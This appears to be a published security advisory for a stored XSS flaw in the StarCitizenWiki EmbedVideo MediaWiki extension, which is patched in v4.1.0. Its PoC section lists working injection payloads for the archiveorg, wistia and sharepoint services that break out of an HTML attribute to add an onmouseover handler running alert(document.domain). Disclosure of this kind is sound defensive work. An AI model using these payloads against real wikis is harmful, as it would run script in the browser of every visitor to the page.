Summary
StarCitizenWiki Extension Embed Video: Stored XSS via malformed src url with $wgEmbedVideoRequireConsent enabled
Advisory details
Summary
With $wgEmbedVideoRequireConsent enabled (the default), the urls for videos are stored in a json-ified data attributedata-mw-iframeconfig. When given a malformed url or id, the data-mw-iframeconfig attribute can be escaped via single quotes, allowing for html/javascript injection.
Details
The sprintf here adds the iframe config encoded as JSON here. When given a malicious url or id with a single quote, the $this->getUrl() call returns an unescaped payload that terminates the data-mw-iframeconfig attribute and allows for injecting attributes, including handlers, into the figure element. The id regex for the archiveorg service and the url regexes for the wistia and sharepoint services allow for single quotes to be introduced.
PoC
A couple of examples across services
Input:
<embedvideo service="archiveorg" id="x' onmouseover='alert(document.domain)' data-x='"></embedvideo>
Renders:
<figure class="embedvideo" data-service="archiveorg" data-mw-iframeconfig="{"src":"//archive.org/embed/x" onmouseover="alert(document.domain)" data-x="?autoplay=1"}" style="width:640px">
<div class="embedvideo-wrapper" style="height:493px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>
Input:
{{#ev:wistia|https://wistia.com/medias/x'onmouseover='alert(document.domain)'}}
Renders:
<figure class="embedvideo" data-service="wistia" data-mw-iframeconfig="{"src":"//fast.wistia.net/embed/iframe/x" onmouseover="alert(document.domain)" ?autoplay="1"}'" style="width:640px">
<div class="embedvideo-wrapper" style="height:360px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>
{{#ev:sharepoint|https://a.sharepoint.com/sites/x'onmouseover='alert(document.domain)'.aspx}}
Impact
Under the default $wgEmbedVideoRequireConsent = true configuration, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via parameter. It requires no interaction (autofires via autofocus) and executes in the wiki origin for every visitor to the page.
References
- https://github.com/advisories/GHSA-5c7p-g73q-rpg5
- https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/security/advisories/GHSA-5c7p-g73q-rpg5
- https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/commit/370156335b325bb81d14d89edf0a1f2643d50a84
- https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/releases/tag/v4.1.0
Related vulnerabilities
All Supply chain →- HIGHCVE-2026-52798
Gogs has Stored XSS in `.ipynb` Preview
- MEDIUMGHSA-hvqh-jw65-wcpq
devbridge-autocomplete has XSS in its default formatters: formatGroup and formatResult fail to escape HTML in untrusted inputs
- CRITICALCVE-2026-44203
OpenAM has pre-auth Reflected XSS in OAuth2 / OIDC response_mode=form_post via state parameter (FormPostResponse.ftl)
- HIGHGHSA-x975-rgx4-5fh4
appium-mcp: Unescaped Locator Data XSS in MCP-UI Resource (createLocatorGeneratorUI)
- HIGHGHSA-6vxv-wg6j-5qwp
Gogs: XSS in .ipynb files renderer due to outdated notebookjs
- MEDIUMCVE-2026-55877
symfony/ux-icons: XSS via unsanitized SVG content in local files and Iconify on-demand responses